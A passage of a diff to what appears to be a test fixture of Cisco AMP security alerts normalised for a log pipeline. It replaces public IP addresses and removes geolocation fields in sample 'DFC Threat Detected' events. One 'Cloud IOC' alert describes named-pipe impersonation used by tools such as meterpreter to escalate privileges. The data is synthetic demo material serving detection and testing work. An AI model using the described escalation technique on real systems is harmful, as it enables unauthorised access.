Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -514,7 +499,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -550,23 +535,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55805, @@ -592,8 +562,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -606,8 +576,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070137162Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898051200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -625,7 +595,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -661,23 +631,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55809, @@ -703,8 +658,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -717,8 +672,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070139211Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898057100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -736,7 +691,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -772,23 +727,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55808, @@ -814,8 +754,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -828,8 +768,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070141304Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898062900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -847,7 +787,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -883,23 +823,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55807, @@ -925,8 +850,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -939,8 +864,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070143371Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898068800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -958,7 +883,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -994,23 +919,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.12" }, "source": { "port": 55806, @@ -1036,8 +946,8 @@ ], "ip": [ "10.10.0.0", - "8.8.4.4", - "8.8.8.8", + "67.43.156.12", + "81.2.69.144", "10.10.10.10" ] }, @@ -1050,8 +960,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070145466Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898074700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", "action": "DFC Threat Detected", @@ -1069,7 +979,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -1119,7 +1029,7 @@ "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1129,8 +1039,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:16.070147485Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", + "ingested": "2021-12-09T13:35:32.898080600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-15T10:32:58.000Z", @@ -1151,7 +1061,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1208,7 +1118,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1225,8 +1135,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070149770Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat 